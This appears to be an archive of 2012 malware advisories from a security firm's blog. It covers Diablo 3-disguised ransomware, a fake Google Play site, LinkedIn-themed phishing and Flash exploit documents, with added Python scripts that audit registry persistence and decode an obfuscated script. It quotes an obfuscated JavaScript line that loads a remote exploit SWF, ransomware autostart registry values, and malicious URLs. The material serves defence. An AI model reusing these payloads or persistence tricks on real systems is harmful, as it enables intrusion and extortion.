
6/11/2012

[Caution] Ransomware disguised as a Diablo 3 file

1. Introduction

INCA Internet's response team detected ransomware disguised as a Diablo 3 related file. Ransomware is a class of malware that restricts access to the computer system it infects and demands a ransom, paid to the creator of the malware, for the restriction to be removed. Ransomware typically propagates like a conventional computer worm, entering a system through, for example, a vulnerability in a network service or a downloaded file. The program then runs a payload that begins to encrypt personal files on the hard drive.



Ransomware:

Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) is a class of malware that restricts access to the computer system it infects and demands a ransom, paid to the creator of the malware, for the restriction to be removed.

2. Malicious file info

Diablo III is a dark fantasy/horror-themed action game by Blizzard Entertainment. Before its release, the game broke several presale records and became the most pre-ordered PC game of all time on Amazon.com. Attackers are using the popularity of this game to spread malicious files.


The malicious file is named "Diablo_III.exe", the same as the real Diablo file. It copies itself into the Application Data folder.


When the malicious file is executed, it modifies the registry so that it runs again on reboot, and it blocks Windows Task Manager from opening. It also changes the desktop background image and disrupts normal use.

HKLM\Software\Microsoft\Active Setup\Installed Components\{Gusfa7ep-lUCJ-Ed2r-Yvs8-fYwL6tnW7CxX}\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe /ActiveX
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
DisableTaskMgr = "1"
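The registry changes above are the part of this sample a defender can check for directly. The following Python script is an added example (not INCA Internet's code) that parses entries in the same "KEY\Name: data" form as listed above, here embedded as constructed sample input with one clean Winlogon Shell value added, and flags the four persistence tricks the sample uses: a replaced Winlogon Shell, an extra entry prepended to Userinit, autostart values pointing into the user profile, and Task Manager disabled by policy.

```python
import re

# Registry entries as listed in the advisory, used as constructed sample input;
# one "KEY\ValueName: data" pair per line. The HKLM Winlogon Shell line is set
# to its clean default so the audit shows a non-finding as well.
SAMPLE_ENTRIES = r"""
HKLM\Software\Microsoft\Active Setup\Installed Components\{Gusfa7ep-lUCJ-Ed2r-Yvs8-fYwL6tnW7CxX}\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe /ActiveX
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: explorer.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr: 1
"""

# Autostart data pointing into a per-user profile location is suspicious:
# legitimate Winlogon and Run entries live under %WinDir% or Program Files.
USER_WRITABLE = re.compile(r"%appdata%|\\application data\\|\\appdata\\", re.I)

def parse_entries(text):
    """Yield (key_path, value_name, data) from 'KEY\\Name: data' lines."""
    for line in text.strip().splitlines():
        key, _, data = line.partition(": ")
        path, _, name = key.rpartition("\\")
        yield path, name, data.strip()

def audit(text):
    """Return a list of (finding, key_path) for the persistence tricks above."""
    findings = []
    for path, name, data in parse_entries(text):
        p = path.lower()
        if p.endswith(r"\winlogon") and name.lower() == "shell":
            if data.lower() != "explorer.exe":
                findings.append(("Winlogon Shell replaced", path))
        elif p.endswith(r"\winlogon") and name.lower() == "userinit":
            items = [i for i in data.split(",") if i]
            # The clean value is a single userinit.exe entry; anything prepended runs at logon.
            if len(items) != 1 or not items[0].lower().endswith(r"\userinit.exe"):
                findings.append(("Winlogon Userinit hijacked", path))
        elif p.endswith(r"\policies\system") and name.lower() == "disabletaskmgr":
            if data == "1":
                findings.append(("Task Manager disabled by policy", path))
        elif r"\currentversion\run" in p or r"\active setup\installed components" in p:
            if USER_WRITABLE.search(data):
                findings.append(("Autostart from user profile", path))
    return findings

if __name__ == "__main__":
    for finding, path in audit(SAMPLE_ENTRIES):
        print(f"{finding}: {path}")
```

On a live host the same checks apply to the output of reg export or a forensic registry dump converted to this line format.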

Furthermore, it can change the PC's name and OS version name, which it reports to the following URL:

hxxp://galbbza.com/partner2/universalpanel/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=192.168.0.1&winver=Windows XP Professional x32

The following figure shows a case disguised as the GVU, the Gesellschaft zur Verfolgung von Urheberrechtsverletzungen (a German association that investigates cases of software, music, and motion picture copyright infringement), whose official web site is:

http://www.gvu.de/index.php?id=39



Once the malicious file runs, the following screen is shown. All input devices are blocked except the field for entering a code. To get the code, victims are told to pay 50 EUR.


Various types of ransomware have been spread. The most common technique is to pose as a message from the police or a public institution, claiming that the victim's PC was infected with malware and used for illegal activity. The user is told to pay within 24 hours, otherwise all data on the HDD will be formatted.

The following figure shows a ransomware page.


3. Summary

These malicious files have been spread via hacked overseas web sites and use exploits for MS Windows/Office, Adobe Flash Player/Reader, and Java. To use your PC safely despite the security threats from such malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications updated with the latest security patches.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection turned "ON".
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received via instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.

6/08/2012

[Warning] Malicious files spread via a fake Google Play market

1. Information

INCA Internet's response team detected malicious APK files being spread from a fake Google Play site. Besides this case, we have reported various others, including shortened URLs on SNS and a famous video-sharing website. With the increasing number of Android users, security threats are growing at the same time. Therefore, Android users should be aware of these malicious files.



2. Spreading cases and symptom of infection

[Information] Continuous threats of Android malicious files
http://en-erteam.nprotect.com/2012/04/information-countinuous-threats-of.html


[Issue] Zombie phone on calling for Korean user?
http://en-erteam.nprotect.com/2012/04/issue-zombie-phone-on-calling-for.html

The official address of Google Play is https://play.google.com. The site's language follows the browser's language.


The fake Google Play site is displayed in Russian.


This site offers about 50 famous Android applications for download.
Each app page shows an installation procedure and tries to get the malware installed by posing as a normal app.
The site even lists several well-known anti-virus apps.


When the user chooses a certain area, an APK file is downloaded and installed with an additional command. All of these apps are malicious APK files built with the same technique, including the same "classes.dex"; the only difference between them is the icon.




The following screen is shown during installation.





These malicious files are detected by our nProtect Mobile for Android.


Besides this web site, various other fake web sites were found.


INCA Internet has detected various Android malicious files overseas.

The following set of captured images shows that various abnormal markets are in operation.


3. Summary

With the growth of Android users, the number of malicious attackers is also increasing.
There has been no statistical report or actual damage case so far; nevertheless, users need to be careful about these security threats. To use a smartphone safely despite the security threats from such malicious applications, we recommend the following "Smartphone security management tips" for general users.

Smartphone security management tips

1. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection turned "ON".
2. Download only applications proven by many users.
3. Use mobile anti-virus software to check downloaded applications before using them.
4. Do not visit suspicious or unknown sites via smartphone.
5. Try not to open MMS, text messages, or e-mails from unknown senders.
6. Always set a strong password on the smartphone.
7. Turn on wireless interfaces like Bluetooth only while they are in use.
8. Do not store important information on the phone.
9. Do not attempt illegal customizing such as rooting or jailbreaking.

INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis and treatment for mobile malware such as the files described above through "nProtect Mobile for Android" and operates a response system against various security threats.

6/05/2012

[Warning] Malicious personal message from a fake LinkedIn friend


1. Information

INCA Internet's response team detected a malicious e-mail disguised as a personal message from LinkedIn, one of the SNS services. LinkedIn is a professional social networking website. Founded in December 2002 and launched in May 2003, it is mainly used for professional networking. As of 9 February 2012, LinkedIn reports more than 150 million registered users in more than 200 countries and territories. Malicious e-mails disguised as sent by LinkedIn have been found several times, carrying ads for Viagra.



This malicious file installs additional malicious files using various exploits, including Adobe Reader (PDF) and Java (JAR).
 
2. Spreading cases and symptom of infection

[Warning] Malicious file about portrait infringement

There have been various malicious e-mails abusing SNS: ▶ notices from Twitter or Facebook ▶ malicious attachments on notices about changing personal information ▶ messages disguised as friend requests.


The most recently found case is disguised as a message sent by a LinkedIn classmate. Of course, it contains malicious links.


These links lead to a certain Bulgarian web site. When the user clicks the URL to addon.html, malicious script code is executed.

When the malicious web site is accessed, the following page is shown. It looks like an invitation from a classmate, but the malicious script code is executed in the background.


"addon.html" contains both LinkedIn-related words and certain scripts.


After the script runs, it redirects to another site and executes "main.php".

- hxxp://h(~)lub.net/main.php?page=d72ac4be16dd8476

"main.php" executes "ap2.php" and "Edu.jar", which carry an Adobe Reader exploit and a Java applet exploit (CVE-2012-0507).

- hxxp://h(~)lub.net/data/ap2.php : a9513.pdf (the file name consists of one letter followed by 4 random digits)
- hxxp://h(~)lub.net/Edu.jar

Once the exploit code runs, it downloads an additional malicious executable, which places a copy of itself in the Application Data folder.


After infection, it connects to a certain host, and the PC can be further damaged by additional attack commands from the attacker.


3. Summary

With the growth of SNS users, malicious file creators and distributors are trying harder to deceive users. To use your PC safely despite the security threats from such malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications updated with the latest security patches.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection turned on.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received via instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.

6/04/2012

[Warning] Malicious file for APT attack using the CVE-2012-0779 exploit


1. Introduction

INCA Internet's response team detected attacks using the latest Adobe Flash Player exploit (CVE-2012-0779). In particular, we found malicious DOC files. For these reasons, users need to keep Adobe Flash Player updated to be safe from these threats, and should be careful when downloading attachments from suspicious e-mails.



2. Cases of CVE-2012-0779

Various malicious files using the CVE-2012-0779 exploit have been found. The following figure shows the malicious DOC files.



■ Malicious e-mail on April 13, 2012

This DOC file uses the CVE-2012-0779 exploit and is written in Korean, so we can assume it was used for an APT attack in Korea.

The file name is "유통관련자료_수정본.doc". The run screen is as follows.


This malicious DOC file contains script code that makes the user's PC access a certain URL, where the malicious "exp.swf" was hosted. This malicious SWF has since been removed.

[download]
http://(~~)tkorea.com/uploadfiles/upload/exp.swf


This malicious file contains a malicious EXE (XOR encoded).
Besides this file, there were various malicious files written in English.


■ Malicious e-mail on May 03, 2012


"WUC Invitation Letter Guests.doc" contains the CVE-2012-0779 exploit. The following figure is the run screen.


The DOC file includes the following script code, which loads the malicious SWF file.

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))
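The script above hides the SWF URL behind JavaScript unescape() encoding, and the info= parameter it passes to the SWF is itself hex-encoded zlib data (it starts with the 78 9c zlib header). The following Python script is an added analysis example (not the malware's or INCA Internet's code) that reverses both layers for the line quoted above, embedded here as the sample input; the decoded info value, the SWF host and the raw infosize parameter are returned for inspection, and the meaning of infosize is not assumed.

```python
import re
import zlib
from urllib.parse import unquote, urlsplit, parse_qs

# The obfuscated line from the DOC file, embedded as the sample input.
OBFUSCATED = ("eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf"
              "?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000"
              "%3E%3C/embed%3E')))")

def extract_unescaped(script):
    """Return the decoded string passed to unescape(); JavaScript unescape()
    and URL percent-decoding agree for the %XX forms used here."""
    m = re.search(r"unescape\('([^']*)'\)", script)
    if not m:
        raise ValueError("no unescape() literal found")
    return unquote(m.group(1))

def embed_src(html):
    """Pull the src attribute out of the reconstructed <embed> tag."""
    m = re.search(r"<embed\s+src=([^\s>]+)", html, re.I)
    if not m:
        raise ValueError("no <embed src=...> found")
    return m.group(1)

def decode_info(url):
    """Parse the SWF URL's query string and inflate the hex-encoded zlib
    blob in info=; zlib verifies the trailing Adler-32 checksum for us."""
    parts = urlsplit(url)
    qs = parse_qs(parts.query)
    info = zlib.decompress(bytes.fromhex(qs["info"][0])).decode("ascii")
    return {"swf_host": parts.hostname, "info": info,
            "infosize": qs["infosize"][0]}

def analyse(script):
    """Run both decoding layers on an obfuscated embed line."""
    return decode_info(embed_src(extract_unescaped(script)))

if __name__ == "__main__":
    print(analyse(OBFUSCATED))
```

The inflated info value is the host and port the SWF's payload is pointed at, which is the indicator worth blocking at the proxy alongside the SWF URL itself.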


After the malicious file is downloaded, the following files are executed in sequence.

a. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

b. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

c. C:\Documents and Settings\[user account]\Application Data\conime.exe

3. Summary

The official Adobe Flash Player version 11.2.202.235 is now being distributed. To be safe from the CVE-2012-0779 exploit, users need to install the latest update.

[Download]
http://get.adobe.com/kr/flashplayer/


To use your PC safely despite the security threats from such malicious attachments, we recommend installing the latest security updates and following the "Security management tips" below for general users.

Security management tips

1. Keep the OS and applications updated with the latest security patches.
2. Use anti-virus software from a trusted security company, keep its engine updated, and keep real-time detection turned "ON".
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious with links received via instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) operates a response system against various security threats.